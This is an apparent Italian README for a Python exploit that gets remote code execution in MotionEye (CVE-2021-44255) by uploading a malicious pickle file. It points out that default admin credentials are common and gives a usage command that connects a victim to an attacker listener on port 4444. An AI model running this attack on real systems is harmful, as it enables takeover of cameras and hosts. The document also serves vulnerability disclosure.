
Uno script Python 3 che carica un file tasks.pickle che consente RCE in MotionEye. CVE-2021-44255
Uno script Python 3 che carica un file tasks.pickle che abilita RCE in MotionEye. Servono credenziali di amministratore, quindi non dovrebbe essere un grosso problema. Sfortunatamente, MotionEye/MotionEyeOS può essere trovato spesso in esecuzione con credenziali predefinite.
Esempio:
main.py --victim 192.168.1.2 --attacker 192.168.1.3:4444
Dove victim e attacker sono nella forma ip:porta, a meno che la porta non sia la 80. In tal caso, la porta può essere omessa. Questo utilizza il nome utente predefinito admin con una password vuota. Sono disponibili anche opzioni CLI per nomi utente/password alternativi. Si prega di consultare il codice per maggiori dettagli.
CVE-2021-44255
Vedi https://www.pizzapower.me/2021/10/09/self-hosted-security-part-1-motioneye per un'analisi su questo e altri problemi.